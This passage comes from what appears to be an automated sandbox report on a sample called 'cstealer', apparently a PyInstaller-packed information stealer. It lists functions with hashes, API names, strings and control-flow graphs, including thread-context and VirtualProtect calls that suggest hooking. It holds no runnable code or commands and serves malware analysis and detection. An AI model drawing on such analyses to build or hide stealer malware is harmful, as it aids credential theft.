                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                            • Opcode ID: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
                                                                                                                                                            • Instruction ID: ad6fdc4bbfc3f5f58fe21f050ea44ead8b2cd4d6c2ea76146f8f409dc23eb54d
                                                                                                                                                            • Opcode Fuzzy Hash: ecdf086f063d1ff4b022191a002e9e17b8509f6d6c47db3a09a7631b022981ea
                                                                                                                                                            • Instruction Fuzzy Hash: 3AF08122A1978186E7B0CF60B4887B6B390EB44B24F040736D66D466E4DF3CD50C8B00
                                                                                                                                                            Function 00007FF8A48FF8D0 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2714325177.00007FF8A48F1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8A48F0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2714275886.00007FF8A48F0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff8a48f0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                                            • Opcode ID: f9f7b25920dae3aac1161b1ec18df20630773ad87d50c89e9d98f821025bc521
                                                                                                                                                            • Instruction ID: 4d3bd78b8807d4a24e19804f017a248f4d910cf8339e1cb4c9b271dd76f99f82
                                                                                                                                                            • Opcode Fuzzy Hash: f9f7b25920dae3aac1161b1ec18df20630773ad87d50c89e9d98f821025bc521
                                                                                                                                                            • Instruction Fuzzy Hash: E6A1F725B0BB47A5FE558B55B8D12382294FF44BC8F644576CA0E4BBB0EFACB491C340
                                                                                                                                                            Function 00000271DC6728C8 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 35d1efe4857f8844a1db8c4c8ed7dc734db620b0767d36ab5b03d26aefcb1554
                                                                                                                                                            • Instruction ID: 7ae02c9638ca6b5856d96e9c4271dc4d881285ea44c1e04e6b5846c68a01a61f
                                                                                                                                                            • Opcode Fuzzy Hash: 35d1efe4857f8844a1db8c4c8ed7dc734db620b0767d36ab5b03d26aefcb1554
                                                                                                                                                            • Instruction Fuzzy Hash: A621D232309741CAE7718F5BA84466EB7A4FB84F80F584929DF9943B94EF34C8518B00
                                                                                                                                                            Function 00007FF6957E1A90 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _fread_nolock$Message
                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                            • API String ID: 677216364-1384898525
                                                                                                                                                            • Opcode ID: 3993bc85ff956f219f6070cd6128d1ded84467a5356abd9fec022793e9654e66
                                                                                                                                                            • Instruction ID: 7988fca4b0f6ee0aa291819cf41753e6953f9551a20a04bb45a4accfa527e6ce
                                                                                                                                                            • Opcode Fuzzy Hash: 3993bc85ff956f219f6070cd6128d1ded84467a5356abd9fec022793e9654e66
                                                                                                                                                            • Instruction Fuzzy Hash: A6516971A0974286EB34DF28E5951B873E0EF48F88F5181B6DA0DCB7A5DE2CEA44C704
                                                                                                                                                            Function 00007FF6957E23D0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                            • String ID: P%
                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                            • Opcode ID: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                                                                                                                            • Instruction ID: f31248d575e6ba4f98f790ba6f84a048c95880145c134868733e6c2382d3d428
                                                                                                                                                            • Opcode Fuzzy Hash: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                                                                                                                            • Instruction Fuzzy Hash: 6051F336618BA186D6389F36A4181BAB7E1FB98B65F004122EBDE83694DF3CD445DB10
                                                                                                                                                            Function 00007FF6957E1590 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message
                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                            • Opcode ID: bf0fddbb6d8c69d18284353368b1d405461daf32cb687c8142f9a085ed163b8f
                                                                                                                                                            • Instruction ID: 21f2d2816fdf7cbef9e5b2a176c0a0476fe0f70f9ec9261e16c36fcddbe290cd
                                                                                                                                                            • Opcode Fuzzy Hash: bf0fddbb6d8c69d18284353368b1d405461daf32cb687c8142f9a085ed163b8f
                                                                                                                                                            • Instruction Fuzzy Hash: 89317F21B0875286EB30EF12E5415FAA3D1EB05FD4F484472DE4D8BAA5EE7CEA498300
                                                                                                                                                            Function 00007FF6957E1050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message
                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                            • Opcode ID: f97452dd21fd68945824e535ab0dcf4460ea7f6a2e6be1a6213f334e5e25e01b
                                                                                                                                                            • Instruction ID: bcda495ceb30ac458ef12f31480d1d72b2449a15a63fd95dcf8090f1a414b292
                                                                                                                                                            • Opcode Fuzzy Hash: f97452dd21fd68945824e535ab0dcf4460ea7f6a2e6be1a6213f334e5e25e01b
                                                                                                                                                            • Instruction Fuzzy Hash: B051AF22B0978285EB30DB15E8417FA62D5FB84F94F444176DE4ECB7A5EE3CEA498700
                                                                                                                                                            Function 00007FF6957FC80C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 579 7ff6957fc80c-7ff6957fc832 580 7ff6957fc834-7ff6957fc848 call 7ff6957f5c94 call 7ff6957f5cb4 579->580 581 7ff6957fc84d-7ff6957fc851 579->581 599 7ff6957fcc3e 580->599 583 7ff6957fcc27-7ff6957fcc33 call 7ff6957f5c94 call 7ff6957f5cb4 581->583 584 7ff6957fc857-7ff6957fc85e 581->584 601 7ff6957fcc39 call 7ff6957fb698 583->601 584->583 587 7ff6957fc864-7ff6957fc892 584->587 587->583 588 7ff6957fc898-7ff6957fc89f 587->588 591 7ff6957fc8a1-7ff6957fc8b3 call 7ff6957f5c94 call 7ff6957f5cb4 588->591 592 7ff6957fc8b8-7ff6957fc8bb 588->592 591->601 597 7ff6957fcc23-7ff6957fcc25 592->597 598 7ff6957fc8c1-7ff6957fc8c7 592->598 602 7ff6957fcc41-7ff6957fcc58 597->602 598->597 603 7ff6957fc8cd-7ff6957fc8d0 598->603 599->602 601->599 603->591 606 7ff6957fc8d2-7ff6957fc8f7 603->606 608 7ff6957fc92a-7ff6957fc931 606->608 609 7ff6957fc8f9-7ff6957fc8fb 606->609 610 7ff6957fc933-7ff6957fc93f call 7ff6957fe3ac 608->610 611 7ff6957fc906-7ff6957fc91d call 7ff6957f5c94 call 7ff6957f5cb4 call 7ff6957fb698 608->611 612 7ff6957fc922-7ff6957fc928 609->612 613 7ff6957fc8fd-7ff6957fc904 609->613 619 7ff6957fc944-7ff6957fc95b call 7ff6957fb700 * 2 610->619 640 7ff6957fcab0 611->640 614 7ff6957fc9a8-7ff6957fc9bf 612->614 613->611 613->612 617 7ff6957fc9c1-7ff6957fc9c9 614->617 618 7ff6957fca3a-7ff6957fca44 call 7ff69580476c 614->618 617->618 621 7ff6957fc9cb-7ff6957fc9cd 617->621 629 7ff6957fcace 618->629 630 7ff6957fca4a-7ff6957fca5f 618->630 642 7ff6957fc95d-7ff6957fc973 call 7ff6957f5cb4 call 7ff6957f5c94 619->642 643 7ff6957fc978-7ff6957fc9a3 call 7ff6957fd034 619->643 621->618 627 7ff6957fc9cf-7ff6957fc9e5 621->627 627->618 632 7ff6957fc9e7-7ff6957fc9f3 627->632 638 7ff6957fcad3-7ff6957fcaf3 ReadFile 629->638 630->629 634 7ff6957fca61-7ff6957fca73 GetConsoleMode 630->634 632->618 636 7ff6957fc9f5-7ff6957fc9f7 632->636 634->629 639 7ff6957fca75-7ff6957fca7d 634->639 636->618 641 7ff6957fc9f9-7ff6957fca11 636->641 644 7ff6957fcbed-7ff6957fcbf6 GetLastError 638->644 645 7ff6957fcaf9-7ff6957fcb01 638->645 639->638 648 7ff6957fca7f-7ff6957fcaa1 ReadConsoleW 639->648 651 7ff6957fcab3-7ff6957fcabd call 7ff6957fb700 640->651 641->618 652 7ff6957fca13-7ff6957fca1f 641->652 642->640 643->614 649 7ff6957fcc13-7ff6957fcc16 644->649 650 7ff6957fcbf8-7ff6957fcc0e call 7ff6957f5cb4 call 7ff6957f5c94 644->650 645->644 646 7ff6957fcb07 645->646 654 7ff6957fcb0e-7ff6957fcb23 646->654 656 7ff6957fcaa3 GetLastError 648->656 657 7ff6957fcac2-7ff6957fcacc 648->657 661 7ff6957fcc1c-7ff6957fcc1e 649->661 662 7ff6957fcaa9-7ff6957fcaab call 7ff6957f5c28 649->662 650->640 651->602 652->618 660 7ff6957fca21-7ff6957fca23 652->660 654->651 664 7ff6957fcb25-7ff6957fcb30 654->664 656->662 657->654 660->618 668 7ff6957fca25-7ff6957fca35 660->668 661->651 662->640 671 7ff6957fcb32-7ff6957fcb4b call 7ff6957fc424 664->671 672 7ff6957fcb57-7ff6957fcb5f 664->672 668->618 679 7ff6957fcb50-7ff6957fcb52 671->679 675 7ff6957fcb61-7ff6957fcb73 672->675 676 7ff6957fcbdb-7ff6957fcbe8 call 7ff6957fc264 672->676 680 7ff6957fcb75 675->680 681 7ff6957fcbce-7ff6957fcbd6 675->681 676->679 679->651 683 7ff6957fcb7a-7ff6957fcb81 680->683 681->651 684 7ff6957fcb83-7ff6957fcb87 683->684 685 7ff6957fcbbd-7ff6957fcbc8 683->685 686 7ff6957fcba3 684->686 687 7ff6957fcb89-7ff6957fcb90 684->687 685->681 689 7ff6957fcba9-7ff6957fcbb9 686->689 687->686 688 7ff6957fcb92-7ff6957fcb96 687->688 688->686 691 7ff6957fcb98-7ff6957fcba1 688->691 689->683 690 7ff6957fcbbb 689->690 690->681 691->689
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: e6e9ca765fa647dc4aa1628c0431ca1bf8d8f0a3c5e0b7675abe670f7d6e3383
                                                                                                                                                            • Instruction ID: 37896a5498843eb80ef82efb5c5c90a278b3208ad27dfb8db9a6b33ba3efabbb
                                                                                                                                                            • Opcode Fuzzy Hash: e6e9ca765fa647dc4aa1628c0431ca1bf8d8f0a3c5e0b7675abe670f7d6e3383
                                                                                                                                                            • Instruction Fuzzy Hash: CDC1E122A1CA8791EB71CB1594402BD3BE9EB80F84F5941B1DE4E8B391DE7CEE45E310
                                                                                                                                                            Function 00000271DC673790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                            • String ID: wr
                                                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                            • Instruction ID: 1f76bd5378032364c0c66ec421b8ba12abb822c28e20eaaac5cd2e33ebbb1b20
                                                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                            • Instruction Fuzzy Hash: 6311827530AB4086EF249FA9E50825A6660FF44F85F540934DF8D07B94EF3DC515CB04
                                                                                                                                                            Function 00000271DC675B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 698 271dc675b30-271dc675b57 699 271dc675b6b-271dc675b76 GetCurrentThreadId 698->699 700 271dc675b59-271dc675b68 698->700 701 271dc675b78-271dc675b7d 699->701 702 271dc675b82-271dc675b89 699->702 700->699 703 271dc675faf-271dc675fc6 call 271dc677940 701->703 704 271dc675b9b-271dc675baf 702->704 705 271dc675b8b-271dc675b96 call 271dc675960 702->705 708 271dc675bbe-271dc675bc4 704->708 705->703 709 271dc675c95-271dc675cb6 708->709 710 271dc675bca-271dc675bd3 708->710 718 271dc675e1f-271dc675e30 call 271dc6774bf 709->718 719 271dc675cbc-271dc675cdc GetThreadContext 709->719 713 271dc675bd5-271dc675c18 call 271dc6785c0 710->713 714 271dc675c1a-271dc675c8d call 271dc674510 call 271dc6744b0 call 271dc674470 710->714 725 271dc675c90 713->725 714->725 731 271dc675e35-271dc675e3b 718->731 723 271dc675ce2-271dc675d03 719->723 724 271dc675e1a 719->724 723->724 730 271dc675d09-271dc675d12 723->730 724->718 725->708 734 271dc675d14-271dc675d25 730->734 735 271dc675d92-271dc675da3 730->735 736 271dc675e41-271dc675e98 VirtualProtect FlushInstructionCache 731->736 737 271dc675efe-271dc675f0e 731->737 743 271dc675d27-271dc675d3c 734->743 744 271dc675d8d 734->744 738 271dc675e15 735->738 739 271dc675da5-271dc675dc3 735->739 745 271dc675e9a-271dc675ea4 736->745 746 271dc675ec9-271dc675ef9 call 271dc6778ac 736->746 740 271dc675f10-271dc675f17 737->740 741 271dc675f1e-271dc675f2a call 271dc674df0 737->741 739->738 748 271dc675dc5-271dc675e0c call 271dc673900 739->748 740->741 750 271dc675f19 call 271dc6743e0 740->750 762 271dc675f2f-271dc675f35 741->762 743->744 752 271dc675d3e-271dc675d88 call 271dc673970 SetThreadContext 743->752 744->738 745->746 747 271dc675ea6-271dc675ec1 call 271dc674390 745->747 746->731 747->746 748->738 763 271dc675e10 call 271dc6774dd 748->763 750->741 752->744 764 271dc675f77-271dc675f95 762->764 765 271dc675f37-271dc675f75 ResumeThread call 271dc6778ac 762->765 763->738 766 271dc675f97-271dc675fa6 764->766 767 271dc675fa9 764->767 765->762 766->767 767->703
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1666949209-0
                                                                                                                                                            • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                                                            • Instruction ID: a0ef61eaca6f478601609124bd3b8dffd40535fde0eea172761b3dee05fbbc9d
                                                                                                                                                            • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                                                            • Instruction Fuzzy Hash: BAD18D76209B8885DB70DF4AE49835A77A0F788B84F100956EACD47BA5EF7CC561CF40
                                                                                                                                                            Function 00007FF6957E25E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                            • Opcode ID: 267098d25035b94134717001de08b9299095ffdd58f7f8dc022cf584bdac5a0d
                                                                                                                                                            • Instruction ID: da05d12b5e6610342280c981c3614d81ade5baa9daad2b6454da0cb9062ecfc4
                                                                                                                                                            • Opcode Fuzzy Hash: 267098d25035b94134717001de08b9299095ffdd58f7f8dc022cf584bdac5a0d
                                                                                                                                                            • Instruction Fuzzy Hash: 04314E76A09A8289EB34DF21E9551F973A4FF88B84F440176EA4D8BB95DF3CDA05C700
                                                                                                                                                            Function 00000271DC6750D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 797 271dc6750d0-271dc6750fc 798 271dc6750fe-271dc675106 797->798 799 271dc67510d-271dc675116 797->799 798->799 800 271dc675118-271dc675120 799->800 801 271dc675127-271dc675130 799->801 800->801 802 271dc675132-271dc67513a 801->802 803 271dc675141-271dc67514a 801->803 802->803 804 271dc675156-271dc675161 GetCurrentThreadId 803->804 805 271dc67514c-271dc675151 803->805 807 271dc675163-271dc675168 804->807 808 271dc67516d-271dc675174 804->808 806 271dc6756d3-271dc6756da 805->806 807->806 809 271dc675176-271dc67517c 808->809 810 271dc675181-271dc67518a 808->810 809->806 811 271dc675196-271dc6751a2 810->811 812 271dc67518c-271dc675191 810->812 813 271dc6751a4-271dc6751c9 811->813 814 271dc6751ce-271dc675225 call 271dc6756e0 * 2 811->814 812->806 813->806 819 271dc675227-271dc67522e 814->819 820 271dc67523a-271dc675243 814->820 821 271dc675236 819->821 822 271dc675230 819->822 823 271dc675255-271dc67525e 820->823 824 271dc675245-271dc675252 820->824 826 271dc6752a6-271dc6752aa 821->826 825 271dc6752b0-271dc6752b6 822->825 827 271dc675273-271dc675298 call 271dc677870 823->827 828 271dc675260-271dc675270 823->828 824->823 830 271dc6752b8-271dc6752d4 call 271dc674390 825->830 831 271dc6752e5-271dc6752eb 825->831 826->825 838 271dc67529e 827->838 839 271dc67532d-271dc675342 call 271dc673cc0 827->839 828->827 830->831 840 271dc6752d6-271dc6752de 830->840 833 271dc675315-271dc675328 831->833 834 271dc6752ed-271dc67530c call 271dc6778ac 831->834 833->806 834->833 838->826 844 271dc675344-271dc67534c 839->844 845 271dc675351-271dc67535a 839->845 840->831 844->826 846 271dc67536c-271dc6753ba call 271dc678c60 845->846 847 271dc67535c-271dc675369 845->847 850 271dc6753c2-271dc6753ca 846->850 847->846 851 271dc6754d7-271dc6754df 850->851 852 271dc6753d0-271dc6754bb call 271dc677440 850->852 854 271dc675523-271dc67552b 851->854 855 271dc6754e1-271dc6754f4 call 271dc674590 851->855 863 271dc6754bf-271dc6754ce call 271dc674060 852->863 864 271dc6754bd 852->864 856 271dc675537-271dc675546 854->856 857 271dc67552d-271dc675535 854->857 869 271dc6754f8-271dc675521 855->869 870 271dc6754f6 855->870 861 271dc675548 856->861 862 271dc67554f 856->862 857->856 860 271dc675554-271dc675561 857->860 867 271dc675564-271dc6755b9 call 271dc6785c0 860->867 868 271dc675563 860->868 861->862 862->860 873 271dc6754d2 863->873 874 271dc6754d0 863->874 864->851 876 271dc6755c8-271dc675661 call 271dc674510 call 271dc674470 VirtualProtect 867->876 877 271dc6755bb-271dc6755c3 867->877 868->867 869->851 870->854 873->850 874->851 882 271dc675663-271dc675668 GetLastError 876->882 883 271dc675671-271dc6756d1 876->883 882->883 883->806
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                            • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                                                            • Instruction ID: feac1331536a9838e329a67258f1869d86310d0ff4494a2a8ad06da83b29fabf
                                                                                                                                                            • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                                                            • Instruction Fuzzy Hash: 1F02AB3621EB848AEB60CF99E49475AB7A0F7C4794F104915EA8E47BA8EF7CC455CF00
                                                                                                                                                            Function 00007FF6957E3F00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF6957E39CA), ref: 00007FF6957E3F34
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6957E8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E29F4
                                                                                                                                                              • Part of subcall function 00007FF6957E29C0: MessageBoxW.USER32 ref: 00007FF6957E2AD0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
